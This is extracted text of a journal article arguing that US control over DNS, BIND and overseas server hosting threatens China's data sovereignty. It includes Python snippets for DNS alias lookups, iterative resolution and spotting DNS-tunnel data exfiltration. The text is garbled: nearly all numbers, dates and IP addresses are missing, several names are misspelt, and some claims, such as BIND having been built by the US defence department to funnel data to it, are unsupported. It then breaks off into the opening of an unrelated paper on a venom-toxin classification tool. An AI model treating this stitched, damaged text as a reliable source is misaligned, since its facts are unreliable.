enforce the personal data protection in the digital economy era and to replace the data protection act. the general data protection regulations (gdpr) adopted by the european parliament came into effect on may , . the regulation extends the data protection from subordinates to owners, refines the classification of personal private data, clarifies the “consent” requirements of the data subject, and guarantees the individual’s access to the data, the right to restrict processing and the right to refuse data using, and “portable rights" (obtaining a copy of personal data processing), "erasing rights" (also known as the right to be forgotten). severe high-limit penalties have been imposed for data managers and processors who violate the law to negate data owner rights, to restrict data processing, to interrupt data transmission or to prohibit data access. trump is in a tit for tat, and signed the clarify lawful overseas use of data (cloud) on march , ; two months in advance of the european union, requiring the us federal bureau of investigation (fbi) and other law enforcement agencies have the right to get access to internet data worldwide. the bill holds that timely access to electronic data provided by communication service providers is the key to the us governments for protecting public safety and combating major crimes, including terrorism; the international journal of advanced network, monitoring and controls volume , no. , communication service providers that regulate, control or own such data should subject to the us law. the bill also allows other countries to store personal data of non-us citizens in the united states. 
according to professionals, the bill gives us law enforcement agencies infinite priority for administrating any data controlled by the service provider, regardless of where the data is stored and where it created. in other words, the clarify lawful overseas use of data holds that the us government, usa companies and institutions are legal and legitimate in accessing any data in the world to be prosecuted and punished against the eu general data protection regulations. . the year , it called the “first world data protection year”. undoubtedly, the protection of data sovereignty and security has risen to the battle for national sovereignty and security. what we have seen is still the battle for cyberspace data that dominated by “us priority”, “us interest first”. “dns execution day” indicates that the cyberspace data battle has penetrated into the control and command system of the internet in all directions. nomine, one of the world's three largest network information centers, is one of the world's first professional cctld (country code top level domain) operators. the uk’s .uk domain name management and registration agency founded in may . nomine believes that dns plays a vital role in every network – it sets the technical standard for translating human-readable domain names into machine-aware internet protocol (ip) addresses. in other words, dns is the underlying backbone platform of network data operations, applications, services, and security. the dispute between data sovereignty and security must first involve the dispute over the control, command, standard, and initiative and discourse power of the dns. the “dns execution day” is the inevitable result of data sovereignty competition. the united states yields none in cyberspace data, not only in technology but also in the performance and implementation at the legal level. iii. china's network data has major security risks a. servers generally hosted outside the country when observing reversely, china is obviously lagging behind in maintaining data sovereignty and security, protecting data, paying attention to and using data. in the form of insufficient emphasis on law, owner management, and governance of data, many institutions and officials who rely on data and contact with data all day are ignorant of the principles, bottom lines, key points, methods, and approaches of data protection. they are politically confused; formality adhered, technically exaggerated, and lazy in management. according to national information center’s continuous real-time monitoring based on dns open source information, there is a top-down tendency in china’s party and government organs, state-owned enterprises, well-known websites (service providers) and other servers with their servers indirectly or directly hosted outside the country. in recent years, there is a large number of data leakages in citizens' personal data, corporate data, national data, and other data involving important economic, political, social, cultural, military and other sensitive industries. some enterprises provide exclusive services of domestic servers hosting to overseas, and content delivery network (cdn) services, without any scruples and hesitation. in , china ranked first in the top countries of data leaking. the main member including baidu with billion user phone numbers, names and addresses; notecase’s . 
billion email addresses and user passwords sold on the internet; shanghai chonju’s million email addresses and phone numbers; ten cent’s million email address and international journal of advanced network, monitoring and controls volume , no. , user password sold on the network and the like. so far, how do did they reflect and rectify, and how did the government regulatory department investigate and handle with they remain unknown. however, the online articles that disclosed the truth of the leaked data were quickly delete, and the websites that published the articles were under great pressure. not only are the rights of the individuals and units that have leaked data at least not respected and protected, but the national data security issue is actually “turned to domestic sales” after being discovered and alerted by the outside world. it is really a strange thing. on october , , wiki leaks published amazon’s “highly confidential” internal file "amazon atlas." the document lists the address and operational details of more than amazon data centers in cities across nine countries, among them nine data centers are in china with six in beijing. in , amazon signed a contract with the us central intelligence agency (cia) to build a “cloud” for intelligence agencies to integrate and provide information classified as “top secret”. amazon also operates a special gov cloud area (government cloud) for the us government. amazon's government cloud center in china is located in ningxia province. many local development zones and high-tech zones have numbly invited amazon to set up data centers in the region to publicize and provide “business” training for free servers hosting. on november , , amazon publicly announced that it would provide a "cloud" service to the cia and its intelligence system (ic) members, known as the "amazon secret service" (aws secret region). amazon called the service “the first and the only commercial cloud providing the government with a comprehensive data classification service, including non-confidential, sensitive, confidential, top secret data”. amazon is the only company required to certify confidential data in the "cloud". the net ease mail server hosted on amazon's aws service platform. the server is hosted outside the country, on amazon,, meaning that the path and system relying on the dns domain name address translation and resolution depend ocean penetrate (leap) china's “firewall”, with no need to go through the “mirror” in china (with no traces left).it avoid the various monitoring and supervision in china, and the big data managed by the host can be selectively filtered and then “pushed” back to the “cloud” operated b china. b. revolving doors abound in the early years, some college elites in the united states changed their status and became national politicians. some senior generals retired as multinational entrepreneurs or scientific research leaders. they considered the "revolving doors" of identity conversion, which provided the possibility for the realization of the american dream. over the years, the concept and manipulation of the "revolving door" has applied to the internet. based on the situational awareness of dns real-time monitoring, the “revolving door” problem found in the servers and “cloud” centers of publicly known websites. the “vest effect” led by the domestic company and jointly produces the data flow to the outside is called the "inner revolving door", otherwise it is called the "outer revolving door". 
the original source data conducted in china hosted overseas, and the data pushed from overseas is the data being filtered (backup), and cached domestic. data leakage or malicious utilization are only in the moment of "revolving door", and we are often asking and arguing for whether the data is leaked, how much data leaked, "towing the library" or "collision library"..... please note that in recent years, the us department of justice, the federal bureau of investigation, and other public evidences of criminal prosecution of chinese citizens (including my national security officials, international students, researchers, entrepreneurs and the like) are mainly obtain through international journal of advanced network, monitoring and controls volume , no. , the "revolving door"-- open source data, information, and intelligence. the cdn cache server is an important technical model supporting “revolving doors”. it is the source to provide data (content) to the territory, and also the node that receives data (content) from outside the country. its open custom port potentially interacts with other countries. network intrusions and attacks often utilize custom port penetration. among ten cent’s mail servers (ipv addresses), of them belong to los angeles, with an autonomous system as , the owner being owner hurricane electric (he, hurricane electronics); and the rest in shenzhen, with an autonomous system as / , with the owner being ten cent itself. all servers have a "revolving door" function. apple has four major domain names in china. the “guizhou-cloud big data” page is www.colasoft.com.cnicloud.com.cn, and the other three addresses displayed on apple's official website. the "canonical name" of “guizhou-cloud big data” is www.icloud.com.cn.edgekey.net, the website in china is . . . (www.icloud.com.cn), and the owner is as (alibaba cloud). the ipv address . . . mapped to the ipv address . . . , and the owner is akamai corporation of the united states (a service provider with more than one-third of the cdn market in the world). the function of “guizhou-cloud big data” and the “revolving door” is very obvious and typical, and may involve deeper and broader cyberspace sovereignty and security issues. the alias of china railway ’s main website is www. .cn.lxdns.com, the website in china is . . . , the owner is as (china telecom), and the five dnss bound to the alias are all in the united states (as ).it is a typical dns-based content push network (dn-cdn); the domain name of the customer service center dynamic. .cn is hosted by the host’s ip address . . . (as ), the territory is actually taiwan (taipei) and the owner is incredibly the official network operator of taiwan, data communication business group. table i. some of china railway’s sub domain hosted in taiwan [ . . . ] sub-domain name (alias) standardize domain name ip address visible in the territory (a record) business (reference) dynamic. .cn dynamic. .cn.lxdns.com . . . customer service ad. .cn ad. .cn.wscdns.com . . . advertisement travel. .cn travel. .cn.wsglb .com . . . go out hotel. .cn hotel. .cn.wsglb .com . . . hotel wifi. .cn wifi. .cn.wsglb .com . . . radio communication test.wifi. .cn test.wifi. .cn.wscdns.com . . . test eximages. .cn eximages. .cn.wsglb .com . . . picture epay. .cn epay. .cn.lxdns.com . . . electronic payment expay. .cn expay. .cn.wsglb .com . . . epay-hy. .cn epay-hy. .cn.lxdns.com . . . exservice. .cn exservice. .cn.wsglb .com . . . hyfw. .cn hyfw. .cn.lxdns.com . . . 
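the "revolving door" observations above rest on ordinary dns open-source data: following a hostname's cname chain shows which cdn or hosting provider actually serves it, and the terminal a records show where. the sketch below is a minimal illustration of that kind of lookup; it assumes the python dnspython package (the article names no specific tool), the hostname is only an example taken from the discussion above, and the output depends entirely on the live dns configuration at query time.

```python
import dns.resolver  # dnspython, an assumption; the article names no specific tool


def cname_chain(name: str, max_hops: int = 10) -> list:
    """Follow CNAME records from a hostname and return the full alias chain."""
    chain = [name]
    for _ in range(max_hops):
        try:
            answer = dns.resolver.resolve(chain[-1], "CNAME")
        except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN):
            break  # no further alias: the chain ends here
        chain.append(str(answer[0].target).rstrip("."))
    return chain


def terminal_addresses(name: str) -> list:
    """A records of the last name in the chain, i.e. where the content is really served."""
    return [rr.address for rr in dns.resolver.resolve(cname_chain(name)[-1], "A")]


# illustrative hostname from the discussion above; results change with live DNS data
host = "www.icloud.com.cn"
print(" -> ".join(cname_chain(host)))
print(terminal_addresses(host))
```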
international journal of advanced network, monitoring and controls volume , no. , china railways member service’s domain name cx. .cn managed by the host’s ip address . . . (as ), belonging to the united states (california), and the owner is quantil networks. table ii. some of china railway’s sub domain hosted in taiwan [ . . . ] sub-domain name (alias) standardize domain name ip address visible in the territory (a record) business (reference) cx. .cn cx. .cn.wsglb .com . . . member services video. .cn video. .cn.lxdns.com . . . video the above-mentioned hosting servers had opened and used the “tor the onion router” port defined by the internet assigned numbers authority (iana) specification. "onion routing" is an anonymity-orient, self-contained domain name system and proxy mechanism, mostly used for "dark net" and hackers. using tor the onion router to highlight the hosted mainframe will definitely increase risk of severe data leaking. according to the news released by the ministry of public security of china on january , there are million passengers during the national railway spring festival in , which far exceeds the us population ( million). the amount of data and information is considerable, and the value of open source intelligence is difficult to assess. if the united states and taiwan use this path to launch a network attack or hacker intrusion, it will be able to accurately locate and track any target, and the consequences are unimaginable. important note: iana was formerly managed by the national telecommunications and information administration (ntia) of the us department of commerce. the establishment of icann is to fulfill the duties of the iana. the functions of the two are different and mutually reinforcing, and must be implemented in accordance with the no-cost agreement signed with the ministry of commerce and they work well with each other. iana's functions are developed as part of the arpanet’s deployment of the us department of advanced defense research projects agency, including: ) coordinating the allocation of internet protocol’s technical parameters; ) fulfilling duties related to internet dns root zone management; ) assign an internet ip address. iv. the important inspiration provided by “dns implementation day” a. the bankruptcy of the “snowman plan” lie the “snowman plan” proposed and announced by icann in , its english name is “the yeti dns project”, i.e. the “snowman dns plan”. icann's best-known responsibilities and missions are to coordinate the global internet's unique identifier system as a technical coordinator for the internet domain name system (dns) to ensure the stable and secure operation of the unique identifier system. the "snowman dns program" website hosted by icann clearly states that the "snowman dns" system is a test platform for root domain name services and some experiments and will do not add/delete delegates in the iana root zone, and all resource records (resets) are identified by the "yeti” security extensions (dnssec) key, no alternate domain space is provided. paul dixie, proclaimed himself as the “father of domain names”, one of the founders of the snowman dns program, stressed and warned in that if the “snowman plan” is considered to be a domain name expansion, anyone in addition to iana will be able to effectively edit the top-level domain space, such as adding a new top-level domain (tld) or changing the ownership of an existing top-level domain (tld). 
the answer is definitely no; whoever touches it (that is, tries to replace the root domain name service) will die; and if a certain country wants to create its own internet dns system, such independence will be unhealthy, vulgar and short-lived. paul's "snowman dns" working mode: figure . snowman dns working mode. for a long time, some professionals and government officials in china have spared no effort to advocate that the "snowman plan" is led by china and represented by beijing tinder interconnect information technology co. ltd. (bii group), claiming that china had "built a global ipv root server network and demonstrated new ipv root server capabilities", that "china deployed four ipv -based root servers, breaking the predicament of china having no root servers in the past", and the like. ruthlessly, the "dns execution day" brought the "snowman plan" back to reality. the dns compliance results announced the collapse of the "snowman plan" at the very start of the internet's "next years of the dns era"; or else it was a farce exploited by someone. in practice, "alternative routes for the domain name" proved unsustainable, and the investment and foundation behind the "snowman" (deceitful publicity and inflated figures), built up over more than three years, melted away. figure . result of ipv dns compliance testing: beijing tandy interconnect information technology co. ltd. (bii group)'s ipv domain name server (ipv address c:f: : : : a:c ) returned "fatal error detected", with the dns, edns, edns , edns@ , ednsopt, edns opt, do, ednsflags, docookie, edns tcp and optlist probes all timing out; all tests were out of order. it is worth pondering that the dns extension mechanism (edns) was proposed by paul in (rfc ) and became a standard in (rfc ). however, paul turned a blind eye to the "snowman's" deceitful technology, its non-compliant application and its self-deprecation in the internet community (that is, the flexible workaround of the claimed "one world, one internet, one domain name system"). so where does the reason lie? is paul fooling the experts of the bii group, or vice versa? or is there a tacit agreement between the two? the above facts also clearly reveal that the vitality of the internet based on ipv technology is still vigorous. for the united states, the "dns era of the next years" is still the ipv era. according to the "usg v status statistics" collected by the national institute of standards and technology (nist) until december , only % of the us-supported ipv industry sites are still in operation in spite of the us government's nearly -year ipv transition plan, and % of them have transitions or no progress; only % of us universities use ipv domain name operations, and % of them have transitions or no progress, which is an abnormal dynamic that cannot be ignored.
operators who are under higher pressure of an ipv addresses shortage have a low ipv deployment rate, which does mean that there is no urgency to deploy ipv in a client/server (c/s) environment in many areas of the internet. in other words, the pressure of address shortage is not a sufficient and necessary prerequisite for deploying ipv on a large scale. entrusted by the office of the chief technology officer (octo) of the internet corporation for assigned names and numbers (icann), the internet governance projects group (igp) of the institute of public policy at the georgia institute of technology published a survey report entitled “latent standard war” in february , the research analysis found that it’s not a “transition” issue that makes sense between ipv and ipv , but economic disputes between the two routes in technological evolution; and the current lopsided ipv deployment rate and the relevant data violates a simple or predictable pattern. according to “supporting china's ipv scale deployment - china's ipv service end-to-end user experience monitoring report” released by china's “national next generation internet industry technology innovation strategic alliance” on november , , there are . million ipv active users (ipv allocated and with ipv internet history records within one year) with mobile broadband and . million with fixed broadband, . million in total. according to the “promoting the scale of ipv deployment” requirements to reach a million at the end of , the current number is still far behind. ipv subverts the situation of ipv network application architecture, and it is difficult to solve a large number of known and unknown security traps and security barriers.: huge investment and operation and maintenance costs, and the economic benefit in the future is distant no matter whether it is market economy or planned economy; the balance of trade-offs. it is imperative to re-adjust the strategy of deploying ipv in a realistic manner. our country must make an early decision. in the face of well-known and irrefutable facts, what will the beijing tandy interconnect information technology co. ltd. (bii group)’s experts say? self-defense or explanation? should the administrative, law enforcement, auditing, and supervision departments of the state and governments at all levels seriously perform their duties? b. bind is the key and crucial part the us defense advanced research projects agency (darpa) funded the development of bind in and bind, which was taken over by the us internet systems alliance (isc) after , is the most important core step and strategic deployment of the internet. it is for not only the "kidnapping" of the dns hub platform, but also for the close integration in the "soft and hard" aspects, firmly grasping and controlling the ownership, command, control and decision-making power of the dns. bind has embedded in the dns and has become the “de facto standard” for dns bundled applications. the global software market, which dominates dns applications, is not only a “traffic light” rule that guides the flow of internet data, but also a baton that conducts compulsory obedience if you have “bad behavior”; you will be in violation of the law, get lost, embarrassed, and chaotic or hit the wall. international journal of advanced network, monitoring and controls volume , no. , figure . 
structure of bind the picture above shows that under the role of bind (control command guiding software interconnection and interoperability), the dns application drives the recursive server, the recursive domain name server and the domain name resolution system perform conduct three irreversible domain name resolution iterations by "right to left" interaction process. however, any of these links may be eavesdropped, stolen, tampered with or transferred. it may also be a "safe information exchange" after being "legally mirrored" by the hierarchical service providers. it is “sifter-type” vulnerability that professionals must have knowledge of it. the us department of defense uses the domain name system to set the internet logical boundary, and the us department of defense network information center (dod network information center) operates and manages the military-specific network nipr net. bind (developed by the us department of defense), which is solidified in dns, was targeted to the data flow to the us department of defense network information center firstly and then to other network information center nodes such as intelligence departments. we must pay attention that the process dns request data (and information) is identical during the parsing interaction. some experts explained that: “the content stored in the root server is very few. usually, ordinary users will not access the root server when they surf the internet.” if it is not an ignorant mistake, it must be intentionally misleading. given the information on may , , when the “wandacry” ransom ware incident spread rapidly in international journal of advanced network, monitoring and controls volume , no. , more than countries and regions around the world. a british engineer stumbled upon the "want to cry" virus through domain name to conduct command and control (c&c), and used the "kill switch" method to effectively curb the “wandacry” virus, which was praised by the industry and the media as an “accidental hero”. at the same time, the world has realized the bind solidified” end switch” function of the dns. “termination switch” is a new internet term or a network hot word involving data sovereignty, network security, and internet governance. the exact definition of internet kills which is: a control mechanism designed to be activated as a countermeasure to shut down all or part of the internet traffic. us senator joe lieberman and other people submitted a legislative proposal “protecting cyberspace as a nationalization act asset act of )” (s. ) at the th congress on june , , was called by the media as the internet termination switch act. the electronic privacy information center (epic) of the american civil human rights organization began to track the us government's standard operating procedure secret plan document in . the -page “emergency radio protocols” drafted by the national telecommunications coordination center (ncc) and approved by the national communications system (ncs), proposes the process to “close and restore commercial and private wireless network when the country is in crisis.” it represents the policy of the us government and is also called the "internet kill switch" by the industry and the media. icann's official website published a passage entitled “what is the internet termination switch? who has the key?”on july , , clarifying that the internet "termination switch" is in the domain name root zone and icann holds the key. 
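the "right to left" resolution iterations described above can be made concrete: a resolver that does not use recursion starts at a root server, is referred to the top-level-domain servers, and is referred again to the authoritative servers for the zone before it obtains an answer. the sketch below walks that referral chain. it is a simplified illustration under stated assumptions, not a description of bind's internals: it assumes the python dnspython package and network access, the root-server address used is one public root instance chosen for illustration, and the loop ignores ipv6 glue and dnssec for brevity.

```python
import dns.flags
import dns.message
import dns.query
import dns.rdatatype
import dns.resolver


def resolve_iteratively(qname: str, root_ip: str = "198.41.0.4") -> str:
    """Walk the referral chain root -> TLD -> authoritative, as a non-recursive
    resolver does, and return the final answer section as text."""
    server = root_ip
    for _ in range(16):  # hard stop against referral loops
        query = dns.message.make_query(qname, dns.rdatatype.A)
        query.flags &= ~dns.flags.RD  # iterative: do not ask for recursion
        reply = dns.query.udp(query, server, timeout=3.0)
        if reply.answer:  # reached a server that holds the answer
            return "; ".join(str(rrset) for rrset in reply.answer)
        nameservers = [rr.target for rrset in reply.authority
                       if rrset.rdtype == dns.rdatatype.NS for rr in rrset]
        if not nameservers:
            raise RuntimeError("no answer and no referral received")
        glue = [rr.address for rrset in reply.additional
                if rrset.rdtype == dns.rdatatype.A for rr in rrset]
        # prefer a glue address from the referral; otherwise fall back to the stub resolver
        server = glue[0] if glue else dns.resolver.resolve(str(nameservers[0]), "A")[0].address
    raise RuntimeError("too many referrals")


print(resolve_iteratively("www.example.com"))  # network access required
```

each hop in this loop is one of the iterations the text refers to, and each hop is a point where a response can be observed, cached or altered by whoever operates that level of the hierarchy.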
russian experts call it the “red button of the internet.” europe, russia and other countries have been highly vigilant against the us control and command to solidify bind's dns. the nsd developed by nlnet lab in the netherlands based on bind standards. although the technology research and the support are relatively independent, it has not yet to form a mainstream. but at least, from the perspective of dns application, it is possible to avoid “all eggs in one basket” and reduce risks; and from the perspective of open cooperation, research and development of controllable technologies and products can lead to the balance of different companies and seek a balances; in the long run, it is beneficial to the internet domain “building” to balance of dns control. russia recently announced that it will take the test out of the global internet in the near future (april ). the focus and purpose is to check the content blocked by the traffic, to ensure that the traffic between russian users (more than %) remains in the country, and it can only be the necessary countermeasures about research and development to control parallel dns. our country should catch up. while drawing on and utilizing bind in the united states and nsd in europe, we can encourage the reference to the boundary and frontier security defense measures of the "einstein " plan, and cut into the situational awareness based on real-time monitoring of dns open source data information to accumulate experience, and re-recognize and explore the source of governance and control of the internet, strive to develop the dns system software that is self-controllable and compatible (check and balance) for both bind and nsd. c. data sovereignty and security are the key point in summary, data sovereignty has become the consensus and action of the united states, the european union, and many countries (including the legislation and governance), especially after the “prism gate”, it becomes the important “topflight” without the principle of data sovereignty, not only is data international journal of advanced network, monitoring and controls volume , no. , security and privacy at risk, but national data assets are inevitably threatened. in particular, it should be pointed out that the “interconnection” of the internet today is conditional and bordered! for example, china's ip address is used as a “blacklist” by some professional websites outside the country, and the access to it is prohibited ( , no access authorization). the general identification of data sovereignty is: the government’s control over the collection of data in the country, including data residency (the location where data is forced to store), data retention (the compulsory reservation of data trade records). the united states is the initiator of the internet. at first, it was introduced from the military apa network to the european internet in order to transmit open source data (information, intelligence). for more than half a century, the united states has built and developed the internet; the technological innovation is always about data sovereignty, data security and data utilization (acquiring intelligence)--all for data. even from this perspective, we must re-recognize and deepen our understanding of the relationship between united states and the internet, the world and the internet, china and the internet in all ways. 
we are obviously seriously lagging behind when we continue to follow the understanding, and thinking of the internet or years ago in the united states and the situation even becomes more and more serious, ruthlessly ignoring our innovation and entrepreneurship in cyberspace, making us just wait and see again and again. being completely marginalized, the scientific advancement of the future network is gradually drifting away. today, any network technology carries data. network applications generate data; interconnections exchange data; network services face data; network innovation development (such as artificial intelligence) relies on data; network security (national security) protects data, data has been integrated into the driving force of human social development, building the collective assets, culture and language of the community. data, whether territorial or affiliated, has been transformed and applied in different degrees and at different levels “genetically modified”. the “face-changing” of data has become the norm and has become a subversive factor for maintaining or shaking the fundamentals of cyberspace sovereignty and security. most chinese citizens and officials are not sensitive enough to network data. they know nothing about cloud computing, big data, small probability events, open source information, and always think that there is no bearing between themselves and the unit, not to mention the full use of data, the urgent need to build and develop data centers, and the great importance of it. the dbs group study believes that the overall utilization rate of china's data centers is less than %, and the utilization rate of data centers in the lower cities is only a %. in the next - years, the demand for data centers will not be transferred to the data centers of the lower rate cities on a large scale. because of this, amazon, apple, microsoft, ibm, etc. have come to china to build data centers in the past few years, called china services, which are actually american services. ten cent, net ease, baidu, , railway and even party and government agencies have also been “managed” to overseas hosting servers in exchange for “free” advanced technology services and individual business interests in china. dns-based cdn (and sdn) technology has formed the mainstream and technology trends of the internet for years to come. in most network environments of national key information infrastructure, gatekeepers, firewalls, intrusion detection systems, anti-virus software are usually configured to control the data traffic of tcp/ip and other network protocols, and to implement the physical isolation (pni) between internal networks (private networks) and public internet. international journal of advanced network, monitoring and controls volume , no. , however, the rather universal stipulation and phenomenon deviate from the facts. cyber security threat exploits this cognitive misunderstanding and the blind spot of supervision, dns is used as a carrier to bypass the network security protection mechanism and transmit sensitive data from inside the enterprise to the outside of the enterprise. even the ""physically isolated” private network still relies on dns requests and responses to form an interaction between internal and external network (connection de facto). 
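because dns requests leave even "physically isolated" networks, exfiltration over dns usually shows up as query names whose leftmost labels carry encoded payloads. a common heuristic for spotting this is to flag very long or high-entropy labels. the sketch below is a minimal, self-contained illustration of that heuristic only; the length and entropy thresholds and the sample query names are illustrative assumptions, not values taken from the article or from any monitoring product.

```python
import math
from collections import Counter


def label_entropy(label: str) -> float:
    """Shannon entropy (bits per character) of a DNS label; encoded payloads score high."""
    if not label:
        return 0.0
    counts = Counter(label.lower())
    total = len(label)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())


def looks_like_tunnel(qname: str, max_label_len: int = 40, entropy_threshold: float = 3.5) -> bool:
    """Flag query names whose leftmost label is unusually long or high-entropy.
    Thresholds are illustrative assumptions, not values from the article."""
    head = qname.rstrip(".").split(".")[0]
    return len(head) > max_label_len or label_entropy(head) > entropy_threshold


queries = [
    "www.example.com.",
    "aGVsbG8gd29ybGQgdGhpcyBpcyBleGZpbHRyYXRlZA.7f3c.tunnel.example.net.",
]
for q in queries:
    print(q, "->", "suspicious" if looks_like_tunnel(q) else "ordinary")
```

in a real deployment such a check would sit on the resolver or firewall logs, combined with per-domain query-rate counting, rather than on individual names in isolation.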
usually it is “unblocked” (such as firewall port ) and the commonly-held blind area (such as dns abuse, misuse), so that the abnormal behavior of intranet dns applications and information leakage through dns is basically out of control. figure . dns as a covert channel within protected networks in the diagram above of the us department of energy (doe), the “channels” of ( )-( )-( ) are inherent to the industry intranet and industry extranets, that is, part of the network system; (a)-(b) “channel” is caused by dns abuse or the existence of a loophole in the target terminal, that is, the application of chaos out of control (such as random use of google public dns service, . . . , etc.); ( )-( ) forms the hidden channel of dns that can be used not only as a transmission carrier for leaking data, but also as a means of command and control (c ) (such as apt). johnson from us secretary of homeland security reported in january that the einstein plan for the national cyber security system (ncps) began in and entered the third phase (called e a) in april . it not only monitors cyber attacks, but also has the ability to intercept and handle the confidential information; it can also effectively protect the government network’s security and respond to the most advanced network attack opponents. simultaneously e a provides a platform for new technology research and development, and cooperates with advanced technology and expertise of government departments and private industries to discover unknown network attacks. the us congress has mandated that all federal international journal of advanced network, monitoring and controls volume , no. , administrations join the e a program by the end of . "einstein- " (e a) provides four main functions: ) defense: real-time mitigation of already known or suspected cyber security threats; ) screening: identification of invaded information systems, system components or host terminals, as an immediate response to security incidents; ) perception: customized development, maintenance, and service for the network security status of the federal government information system, based on “security is normal monitoring”. ) discovery: monitoring and identifying new or emerging cyber security threats targeting federal government information systems to enhance cyber security defenses. it is recommended that the state should formulate and launch china's network sovereignty and security strategic plan based on "einstein- " (e a), using the existing network infrastructure to build an autonomous and controllable dns situational awareness system, and build china's data sovereignty, data security, and data utilized for the new cyberspace great wall. v. conclusion today's internet is facing a number of major changes. all countries are trying to grasp the latest technology for this revolution. as the united states announces the abandonment of the “next-generation internet ipng”, it marks the entrance to a new era for the internet. based on the current status of worldwide internet domain name system research, this paper analyzes the international research level of this technology, discusses internet security and data security problems we are now facing, and puts forward the importance of independent research and development of internet domain name system. at present, most of the servers in china are still hosted in foreign countries, which pose considerable, latent danger to data security. 
under the current environment of internet innovation, it is necessary to grasp the immediate opportunities and conduct research and development of the internet domain name system to ensure china's data sovereignty and information security, and keep pace with the internet development era. vi. acknowledgement this passage is written by the director of international strategic research center of china mobile communication federation; the chairman of nanjing huadao network technology co. ltd. submitted june accepted september published october corresponding author paul f. long, paul.long@kcl.ac.uk academic editor jaume bacardit additional information and declarations can be found on page doi . /peerj-cs. copyright gacesa et al. distributed under creative commons cc-by . open access machine learning can differentiate venom toxins from other proteins having non-toxic physiological functions ranko gacesa , david j. barlow and paul f. long , , , institute of pharmaceutical science, king’s college london, london, united kingdom department of chemistry, king’s college london, london, united kingdom brazil institute, king’s college london, london, united kingdom faculdade de ciências farmacêuticas, universidade de são paulo, são paulo, brazil abstract ascribing function to sequence in the absence of biological data is an ongoing challenge in bioinformatics. differentiating the toxins of venomous animals from homologues having other physiological functions is particularly problematic as there are no universally accepted methods by which to attribute toxin function using sequence data alone. bioinformatics tools that do exist are difficult to implement for researchers with little bioinformatics training. here we announce a machine learning tool called ‘toxclassifier’ that enables simple and consistent discrimination of toxins from non-toxin sequences with > % accuracy and compare it to commonly used toxin annotation methods. ‘toxclassifer’ also reports the best-hit annotation allowing placement of a toxin into the most appropriate toxin protein family, or relates it to a non-toxic protein having the closest homology, giving enhanced curation of existing biological databases and new venomics projects. ‘toxclassifier’ is available for free, either to download (https://github.com/rgacesa/toxclassifier) or to use on a web-based server (http://bioserv .bioinfo.pbf.hr/toxclassifier/). subjects bioinformatics, computational biology, data mining and machine learning keywords protein sequences, biological function, animal venom, automatic annotation, functional prediction introduction falling costs of tandem mass spectrometry for shotgun proteomics have made generating vast amounts of protein sequence data increasingly affordable, yet the gap between obtaining these sequences and then assigning biological function to them continues to widen (bromberg et al., ). often, most sequences are deposited into protein databases with little, if any, accompanying experimental data from which biological functions can be inferred. customarily, biological function is deduced indirectly by comparing amino acid sequence similarity to other proteins in large databases to calculate a ranking of proteins with respect to the query sequence. using simple pair-wise comparisons as a sequence searching procedure, the blast suite of programs (for example, blastp) was first of its kind and has gained almost unprecedented acceptance among scientists (neumann, kumar & shalchian-tabrizi, ). 
variations of the blast algorithm (for instance, psi- blast (altschul et al., )) and development of probabilistic models (such as hidden how to cite this article gacesa et al. ( ), machine learning can differentiate venom toxins from other proteins having non-toxic physiological functions. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:paul.long@kcl.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://github.com/rgacesa/toxclassifier http://bioserv .bioinfo.pbf.hr/toxclassifier/ http://dx.doi.org/ . /peerj-cs. markov models, hmms (krogh et al., )) use multiple sequence alignments to detect conserved sequences (also referred to as motifs). use of these models enables detection of remote homology between proteins seemingly unrelated when analysed by pairwise alignment alone (krogh et al., ). conversely, development of accurate algorithms and fast software tools that can automatically identify critical amino acid residues responsible for differences in protein function amongst sequences having exceptionally high sequence similarity remains a challenging problem for bioinformatics. in a post-genomic era, the toxins of venomous animals are an emerging paradigm. animal venoms comprise predominantly toxic peptides and proteins. duplication of genes that formerly encoded peptides and proteins having non-toxic physiological functions is one of the foremost evolutionary drivers that gives rise to the enormous functional diversity seen in animal venom toxins (fry, ; chang & duda, ). however, evidence is ambiguous as to whether these genes were expressed in multiple body tissues, with the duplicate copy then recruited into venom glands with subsequent neo-functionalisation to develop toxicity, or if there was duplication with ensuing sub-functionalisation of genes encoding pre-existing but non-toxic venom gland proteins (hargreaves et al., ). examples of both mechanisms have been demonstrated in different venomous animals (reyes-velasco et al., ; vonk et al., ; junqueira de azevedo et al., ). nonetheless, many toxin proteins that constitute venoms share a remarkable similarity to other proteins with non-toxic physiological functions, and deciphering sequence data to disentangle these functions is not a trivial task (kaas & craik, ). previous proteomic data from our laboratory and subsequent results of others realised an astonishingly high sequence similarity between cnidarian (jellyfish, coral, sea anemones etc.) toxins and those of other higher venomous animals (weston et al., ; weston et al., ; li et al., ; li et al., ). this suggested to us that a small number of sequences, when occurring in combination, might explain this similarity and prompted the search for toxin-specific motifs (starcevic & long, ). an unsupervised procedure was developed that resulted in the identification of motifs we called ‘tox-bits’, and which could describe most toxins as combinations of between – ‘tox-bits’ (starcevic et al., ). the ‘tox-bits’ are defined as hmm-profiles and were found to be superior at differentiating toxin from non-toxin sequences, when compared against standard blast or hmm based methods (starcevic et al., ). however, implementation of ‘tox-bits’ hmm profiles is not straightforward for scientists with little or no bioinformatics experience. 
hence, in this paper we introduce and make freely available an easy-to-use machine learning tool called the ‘toxclassifier’ that employs ‘tox-bits’ hmm profiles and other standard classifier tools running in parallel to distinguish toxins from their non-toxic homologues. methods datasets data for training and testing of machine learning classifiers used in toxclassifier ensemble was obtained from uniprotkb database (bateman et al., ), according to the following methodology: gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ( ) ‘positive’ dataset representing well annotated putative animal toxins was downloaded from uniprotkb/swissprot-toxprot (jungo et al., ). database was searched for animal toxins and venoms, using search query: taxonomy: ‘‘metazoa [ ]’’ (keyword:toxin or annotation:(type: ‘‘tissue specificity’’ venom)). all duplicate entries with identical sequence or sequence identifier were removed, resulting in , sequences. ( ) ‘easy’ negative dataset representative of physiological proteins was obtained by random sampling of , sequences in uniprotkb/swissprot database (bateman et al., ). all entries with duplicate sequence identifier or protein sequence were removed, as were all entries also occuring in positive dataset; final dataset included , protein sequences. ( ) ‘moderate difficulty’ negative dataset was designed to match highly curated toxin- like proteins with physiological function; it was created by blastp searching uniprotkb/swissprot database with positive dataset, with e-value cutoff of . e– . resulting blastp hits were 